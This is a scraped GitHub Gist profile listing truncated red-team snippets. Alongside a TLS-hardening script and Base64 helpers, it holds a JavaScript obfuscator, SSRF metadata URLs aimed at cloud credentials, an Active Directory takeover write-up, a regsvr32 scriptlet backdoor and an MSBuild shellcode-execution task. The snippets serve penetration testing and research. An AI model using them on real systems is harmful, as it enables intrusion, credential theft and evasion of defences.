mosesrenegade mosesrenegade

View GitHub Profile
@mosesrenegade
mosesrenegade / disable_weak_ssl_and_tls_ciphers_in_windows.ps1
Created May 26, 2023 22:45
This quickly disables the weak SSL and TLS protocol versions (SSLv2, SSLv3, TLSv1.0 and TLSv1.1) on Windows systems. It does not touch the cipher strengths in TLSv1.2 and TLSv1.3.
Write-Host 'Powershell Scripts Script to remove SSLv2, SSLv3, TLSv1.0, and TLSv1.1'
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force | Out-Null
New-Item 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force | Out-Null
New-ItemProperty -path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Client' -name 'DisabledByDefault' -
@mosesrenegade
mosesrenegade / convert_from_b64.ps1
Last active January 3, 2023 21:08
Convert a Base64 String to an Executable
$EXE_Path = 'C:\Tools\file.exe'
$Base64_Code = Get-Content('C:\Tools\file.b64') -encoding UTF8
[Byte[]]$Bytes = [convert]::FromBase64String($Base64_Code)
[System.IO.File]::WriteAllBytes($EXE_Path, $Bytes)
@mosesrenegade
mosesrenegade / convert_to_b64.ps1
Created January 3, 2023 21:00
Convert a Binary to Base64 in Powershell
$fp = 'C:\tools\file.exe'
$encf = [System.IO.File]::ReadAllBytes($fp);
[System.Convert]::ToBase64String($encf) | Out-File 'C:\Tools\file.b64'
@mosesrenegade
mosesrenegade / obfuscator.js
Created August 31, 2022 23:58 — forked from cflems/obfuscator.js
Obfuscate JavaScript code into having zero readable characters; I want to improve this not to use eval at all but I'll have to write a JS tokenizer for that.
const fs = require('fs');
const zero = '+[]'; // +[] coerces an empty array to the number 0
const one = '+!![]'; // !![] is true, unary + gives 1
const two = '('+ one + one +')'; // 1+1 = 2
const three = '('+ one + one + one +')'; // 1+1+1 = 3
const four = '('+ one + one + '<<' + one +')'; // (1+1)<<1 = 4 (+ binds tighter than <<)
const five = '('+ four + one +')'; // 4+1 = 5
const six = '('+ one + one + one + '<<' + one +')'; // (1+1+1)<<1 = 6
const seven = '('+ six + one +')'; // 6+1 = 7
@mosesrenegade
mosesrenegade / cloud_metadata.txt
Created December 9, 2021 11:58 — forked from spartantri/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://[fd00:ec2::254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
@mosesrenegade
mosesrenegade / Workstation-Takeover.md
Created August 12, 2021 11:06 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@mosesrenegade
mosesrenegade / Backdoor-Minimalist.sct
Created July 1, 2021 01:03 — forked from enigma0x3/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
@mosesrenegade
mosesrenegade / example_output.txt
Created June 24, 2021 19:34 — forked from danielpops/example_output.txt
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... -
Trying 169.1668966... -
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... -
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
@mosesrenegade
mosesrenegade / execute_x64_shellcode.xml
Created February 16, 2021 23:03 — forked from CCob/execute_x64_shellcode.xml
Execute x64 Shellcode
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
Param(
[Parameter(Mandatory, Position = 0)]
[string]$HostDrive,
[Parameter(Mandatory, Position = 1)]
[string]$LocalDrive
)
# Script to map a host drive inside a Windows Docker Server Container
# You need to be an admin in the container for this to work.
# Use as .\map_host_drive C: X: